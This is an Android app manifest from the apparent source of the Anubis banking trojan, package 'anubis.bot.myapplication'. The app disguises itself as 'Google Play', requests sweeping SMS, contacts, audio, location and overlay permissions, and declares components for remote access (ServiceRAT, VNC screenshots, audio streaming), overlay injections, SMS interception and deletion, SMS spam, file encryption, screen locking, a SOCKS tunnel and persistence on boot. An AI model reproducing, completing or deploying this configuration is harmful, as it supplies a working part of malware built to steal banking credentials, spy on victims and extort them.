<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="anubis.bot.myapplication" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="Google Play" android:name="anubis.bot.myapplication.MainApplication" android:supportsRtl="true" android:theme="@android:style/Theme.Translucent.NoTitleBar">
        <activity android:exported="false" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <meta-data android:name="com.google.android.gms.version" android:value="12211000"/>
        <meta-data android:name="android.support.VERSION" android:value="26.1.0"/>
        <meta-data android:name="android.arch.lifecycle.VERSION" android:value="27.0.0-SNAPSHOT"/>
        <activity android:name="anubis.bot.myapplication.Activity.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name="anubis.bot.myapplication.Receiver.ReceiverMms" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:enabled="true" android:name="anubis.bot.myapplication.Receiver.RecieverPushService" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="anubis.bot.myapplication.SendSms">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>
        <service android:exported="true" android:name="anubis.bot.myapplication.ServiceHeadlessSmsSend" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.ServiceInjections"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.ServiceGeolocationNetwork"/>
        <receiver android:name="anubis.bot.myapplication.Receiver.ReceiverBoot">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
                <category android:name="android.intent.category.HOME"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.DREAMING_STOPPED"/>
            </intent-filter>
        </receiver>
        <activity android:excludeFromRecents="true" android:icon="@drawable/im" android:name="anubis.bot.myapplication.Activity.ActivityPermissions" android:theme="@android:style/Theme.NoDisplay"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.API.Screenshot.ActivityScreenshot"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/im" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityInjection"/>
        <activity android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityGetNumber"/>
        <activity android:icon="@drawable/im" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityAlert1"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/im" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityGetSMS"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.Activity.ActivityAlert2"/>
        <activity android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityStartUSSD"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/im" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityPushInjection"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/im" android:label="" android:launchMode="singleTask" android:name="anubis.bot.myapplication.Activity.ActivityOpenURL"/>
        <receiver android:enabled="true" android:exported="false" android:name="anubis.bot.myapplication.Receiver.ReceiverAlarm"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceCommands"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.StartWhileGlobal"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.ServiceGeolocationGPS"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceDeleteSMS"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceModuleNotification"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.ServiceToast"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.ServicePlayProtectToast"/>
        <service android:label="Google Play" android:name="anubis.bot.myapplication.ServiceAccessibility" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/serviceconfig"/>
        </service>
        <service android:exported="false" android:name="anubis.bot.myapplication.StartWhileRequest"/>
        <service android:exported="true" android:name="anubis.bot.myapplication.API.Screenshot.ServiceScreenshot"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.API.Screenshot.ServiceSendRequestImageVNC"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.API.Sound.ServiceStreamSound"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceRAT"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceFindFiles"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceCryptFiles"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.Activity.ActivityScreenLocker"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.API.Sound.ServiceRecordSound"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.Activity.ActivityAccessibility"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.Activity.ActivityPlayProtect"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.API.Spam.ServiceSpamSMS"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.API.Spam.ServiceSenderSpamSMS"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.socks.ServiceForwardingTunel"/>
        <activity android:icon="@drawable/im" android:label="" android:name="anubis.bot.myapplication.Activity.LookScreen"/>
        <service android:exported="false" android:name="anubis.bot.myapplication.ServiceLookScreen"/>
        <service android:name="anubis.bot.myapplication.ServicePedometer"/>
        <service android:name="anubis.bot.myapplication.LogSrv"/>
        <service android:enabled="true" android:exported="false" android:name="anubis.bot.myapplication.Alarm.EndlessService"/>
        <service android:enabled="true" android:exported="true" android:name="anubis.bot.myapplication.Alarm.JobSchedulerService" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:name="anubis.bot.myapplication.ServiceNL" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService"/>
            </intent-filter>
        </service>
    </application>
</manifest>